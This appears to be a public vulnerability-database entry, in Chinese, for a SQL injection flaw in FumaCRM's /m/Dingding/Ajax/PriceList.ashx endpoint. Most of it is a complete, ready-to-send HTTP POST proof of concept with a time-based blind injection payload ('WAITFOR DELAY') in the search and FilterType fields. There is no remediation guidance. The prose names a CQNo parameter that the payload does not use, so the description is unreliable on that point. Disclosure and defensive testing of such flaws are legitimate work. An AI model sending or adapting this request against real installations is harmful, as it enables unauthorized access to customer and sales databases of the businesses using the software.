孚盟云 CRM /m/Dingding/Ajax/PriceList.ashx SQL 注入漏洞

2026-04-17 孚盟云 PoC Public

Description

孚盟云CRM(FumaCRM)是上海孚盟软件有限公司推出的一款面向外贸企业的客户关系管理系统,提供客户管理、销售管理、邮件营销、订单管理等核心功能,广泛应用于外贸、制造、商贸等行业。孚盟云CRM的 /m/Dingding/Ajax/PriceList.ashx 接口存在SQL注入漏洞,攻击者可通过 CQNo 参数构造恶意SQL语句,获取数据库敏感信息。

PoC

POST /m/Dingding/Ajax/PriceList.ashx HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36

method=moreLoad&num=1&pageSize=20&name=&sort=&FilterType=[OwnerID_1%27]&search=%27%3BWAITFOR%20DELAY%20%270:0:2%27--

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities